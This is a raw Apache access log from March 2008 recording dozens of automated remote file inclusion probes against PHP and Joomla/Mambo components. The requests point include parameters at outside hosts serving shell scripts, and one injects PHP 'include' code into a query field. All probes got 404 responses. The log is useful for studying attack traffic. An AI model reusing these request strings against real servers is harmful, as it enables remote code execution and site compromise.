213.193.222.176 - - [16/Mar/2008:06:56:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:58 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:58 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:56:58 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.150.160.162 - - [16/Mar/2008:06:57:15 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.150.160.162 - - [16/Mar/2008:06:57:21 -0700] "GET /errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.150.160.162 - - [16/Mar/2008:06:57:26 -0700] "GET /logs/errors.php?error=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.87.60.4 - - [16/Mar/2008:06:57:54 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.87.60.4 - - [16/Mar/2008:06:57:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:57:59 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:58:00 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:58:00 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.220.82 - - [16/Mar/2008:06:58:04 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.142.220.82 - - [16/Mar/2008:06:58:04 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.87.60.4 - - [16/Mar/2008:06:58:06 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:58:25 -0700] "GET /logs/access_080220.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:06:58:32 -0700] "GET /logs/access_080228.log//index.php?option=com_restaurante&task=http://www.ibtekarat.com/mychat/chat/localization/romanian/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [16/Mar/2008:06:58:52 -0700] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:06:58:52 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.68.203.22 - - [16/Mar/2008:06:59:10 -0700] "GET //tool/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:06:59:29 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:37 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:40 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:40 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:41 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:06:59:41 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.79.236.170 - - [16/Mar/2008:07:00:14 -0700] "GET /logs/access_080201.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.79.236.170 - - [16/Mar/2008:07:00:15 -0700] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.79.236.170 - - [16/Mar/2008:07:00:33 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:07:02:08 -0700] "GET /logs/access.log//index.php?option=com_restaurante&task=http://www.ibtekarat.com/mychat/chat/localization/romanian/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:07:02:47 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:02:50 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:07:02:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
218.189.141.154 - - [16/Mar/2008:07:03:04 -0700] "GET /config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.70" "www.dmulk.com"
89.149.197.252 - - [16/Mar/2008:07:03:38 -0700] "GET //errors.php?error=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
89.149.197.252 - - [16/Mar/2008:07:03:39 -0700] "GET /logs//errors.php?error=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:03:59 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.204.230.31 - - [16/Mar/2008:07:04:03 -0700] "GET /logs/access_080220.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bossad.com/LoTnoK.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [16/Mar/2008:07:04:03 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bossad.com/LoTnoK.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [16/Mar/2008:07:04:04 -0700] "GET /logs/access_080228.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bossad.com/LoTnoK.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.142.220.82 - - [16/Mar/2008:07:04:42 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.57.15 - - [16/Mar/2008:07:04:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sigma.murcki.pl/mambots/editors/tinymce/jscripts/tinymce/idm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.68.203.22 - - [16/Mar/2008:07:04:45 -0700] "GET /%5Cecommerce%5Cpayment%5Ccybersource.php?path[docroot]=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:07:04:51 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:07:04:52 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:07:04:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/Mar/2008:07:05:04 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.nextlesson.com//cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:07:05:07 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:05:17 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:07:07:03 -0700] "GET /logs/access_080211.log/display.php?page=&lang=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:07:07:16 -0700] "GET /display.php?page=&lang=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:07:07:21 -0700] "GET /logs/access_071229.log//index.php?lang=en&page=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:07:24 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.61 - - [16/Mar/2008:07:07:24 -0700] "GET //index.php?option=com_restaurante&task=http://www.ibtekarat.com/mychat/chat/localization/romanian/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.166.61.155 - - [16/Mar/2008:07:07:44 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
219.166.61.155 - - [16/Mar/2008:07:07:44 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
201.76.163.42 - - [16/Mar/2008:07:07:45 -0700] "GET /logs//index.php?lang=en&page=http://www.drogaembaca.org.br/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.192.152.130 - - [16/Mar/2008:07:07:50 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://chyna.sufx.net/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.192.152.130 - - [16/Mar/2008:07:07:50 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://chyna.sufx.net/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.199.248.34 - - [16/Mar/2008:07:08:11 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.248.34 - - [16/Mar/2008:07:08:11 -0700] "GET /logs/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:08:39 -0700] "GET /logs/access_080122.log/main.php?pageURL=http://www.jef.at/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:08:39 -0700] "GET /main.php?pageURL=http://www.jef.at/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:08:40 -0700] "GET /logs/main.php?pageURL=http://www.jef.at/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:08:40 -0700] "GET /logs/access_080207.log/main.php?pageURL=http://www.jef.at/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.248.34 - - [16/Mar/2008:07:09:43 -0700] "GET /logs/access_080228.log/config.php?path_to_root=http://yugifire.t35.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.30.232 - - [16/Mar/2008:07:11:05 -0700] "GET /retreat1/?M=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.246.155.74 - - [16/Mar/2008:07:11:22 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://noodlee.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
63.246.155.74 - - [16/Mar/2008:07:11:22 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://noodlee.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
194.72.9.24 - - [16/Mar/2008:07:11:33 -0700] "GET /logs/access_080215.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.26 - - [16/Mar/2008:07:11:34 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.72.9.26 - - [16/Mar/2008:07:11:34 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:11:38 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:11:38 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:11:39 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:11:42 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:11:42 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:11:42 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:12:01 -0700] "GET /logs/access_080215.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:12:01 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:12:01 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:12:04 -0700] "GET /logs/access_080215.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:12:04 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:12:05 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:07:12:26 -0700] "GET /logs/access_080124.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [16/Mar/2008:07:12:46 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:07:13:22 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:07:13:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.160.81.126 - - [16/Mar/2008:07:13:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [16/Mar/2008:07:13:43 -0700] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [16/Mar/2008:07:13:43 -0700] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:07:13:48 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:07:13:48 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:07:13:48 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.36.235.74 - - [16/Mar/2008:07:13:55 -0700] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:07:14:03 -0700] "GET /logs/access_080131.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:07:14:04 -0700] "GET /logs/access_080131.log//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:07:14:16 -0700] "GET /logs//mambots/administrator/components/com_swmenupro//components/com_mosmedia/index.php?path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
